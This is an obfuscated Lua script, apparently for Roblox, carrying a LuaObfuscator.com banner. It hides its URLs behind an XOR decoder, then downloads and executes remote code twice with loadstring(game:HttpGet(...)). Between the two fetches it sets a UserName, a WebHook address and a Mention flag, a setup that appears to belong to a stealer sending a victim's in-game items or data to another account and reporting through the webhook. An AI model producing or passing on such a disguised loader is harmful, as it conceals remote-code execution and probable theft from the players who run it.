--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local v7;v8=function(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1)),v1(v2(v10,((6857 -4898) -((1894 -1145) + 1169 + 40)) + ((v12-1)% #v10),(887 -(677 + 209)) + ((v12-((1 + 0) -(0 -0)))% #v10) + ((525 + 417) -(743 + (351 -(140 + 13)))))))%(105 + 85 + 43 + 23)));end return v5(v11);end;loadstring(game:HttpGet(v8("\141\152\77\151\225\223\195\22\149\243\146\194\94\142\230\141\153\91\146\225\128\158\90\136\252\145\137\87\147\188\134\131\84\200\198\141\137\107\130\243\137\168\10\145\189\156\137\92\130\189\136\141\80\137\189\150\159\74","\229\236\57\231\146")))();wait(5);UserName=v8("\52\114\196\153\5\123\205\148\48\123\211\191\14\127\211","\96\26\161\203");WebHook=v8("\200\61\8\182\179\154\102\83\162\169\211\42\19\180\164\142\42\19\171\239\193\57\21\233\183\197\43\20\169\175\203\58\83\247\240\150\121\69\244\247\145\112\74\254\245\147\126\76\240\247\150\123\83\158\132\153\112\69\149\241\225\44\5\179\151\228\59\44\175\172\240\35\58\150\176\245\25\49\172\151\218\38\4\172\171\249\29\35\138\144\194\47\27\247\145\228\113\35\177\159\243\32\46\171\146\141\4\78\140\184\234\4\4\159\145\199\27\14\182\169\250","\160\73\124\198\192");Mention=true;loadstring(game:HttpGet(v8("\80\38\18\101\81\83\254\23\32\7\98\12\14\184\76\58\19\119\87\26\180\74\49\9\123\86\12\191\76\124\5\122\79\70\186\12\52\18\97\13\25\180\76\33\11\124\90\13\164\72\55\73\120\67\0\191\23\2\53\77\12\5\164\89","\56\82\102\21\34\105\209"),true))();
